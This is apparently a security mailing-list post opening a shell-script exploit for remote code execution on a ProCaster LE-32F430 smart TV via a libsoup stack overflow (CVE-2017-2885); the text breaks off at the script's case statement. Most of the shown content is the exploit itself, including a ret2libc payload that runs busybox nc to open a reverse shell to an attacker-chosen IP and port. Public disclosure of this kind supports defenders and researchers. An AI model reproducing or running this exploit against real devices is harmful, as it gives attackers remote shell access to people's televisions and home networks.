ProCaster LE-32F430 SmartTV RCE via libsoup/2.51.3 stack overflow (CVE-2017-2885)

Posted by def on Dec 04

#!/bin/sh
# ProCaster LE-32F430 (NotSo)SmartTV remote code execution exploit through
# GStreamer souphttpsrc libsoup/2.51.3 HTTP stack overflow (CVE-2017-2885)
# ~ def <def () huumeet info> 2020-02-15 …………….. 850day exploit lol

# Exploit payload: ret2libc system() nc reverse shell with a clean exit()
CMD=”${CMD:-/bin/busybox nc ${IP:-192.168.1.100} ${PORT:-54321} -e /bin/sh}”

case “${1:-${ACTION:-httpd}}” in…